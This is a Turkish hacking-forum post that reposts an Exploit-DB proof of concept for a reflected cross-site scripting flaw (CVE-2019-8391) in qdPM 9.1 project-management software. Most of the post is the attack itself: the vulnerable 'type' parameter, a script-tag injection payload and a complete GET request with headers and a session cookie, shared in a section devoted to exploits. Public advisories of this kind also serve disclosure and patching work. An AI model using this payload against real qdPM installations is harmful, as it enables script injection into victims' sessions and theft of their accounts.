İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

qdPM 9.1 - 'type' Cross-Site Scripting

19-02-2019 14:05
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
#Exploit Title/Exploit Başlığı: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date/Tarih: 14-02-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sitesi: Free Web-Based Project Management - qdPM Project Management, Time Tracking, Support Tickets, Open Source
# Software Link/Yazılımın Linki: http://qdpm.net/download-qdpm-free-project-management
# Version/Versiyon: v9.1
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: Wamp64, @win
# Software description/Yazılım Açıklaması: qdPM küçük ekipler için web tabanlı ücretsiz proje yönetim aracı.Tamamen yapılandırılabilirdir.Projeleri ve insanları kolayca yönetebilirsiniz.

# POC - XSS
# Parameters/Parametreler : type
# Attack Pattern/Saldırı Türü : tasks_columns_list<script>bKtx(9366)</script>
# GET Request/GET İsteği: http://localhost/qdpm/index.php/configuration
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx( 9366)</script>
HTTP/1.1

Referrer : http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Exploit Adresi : https://www.exploit-db.com/exploits/46398
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı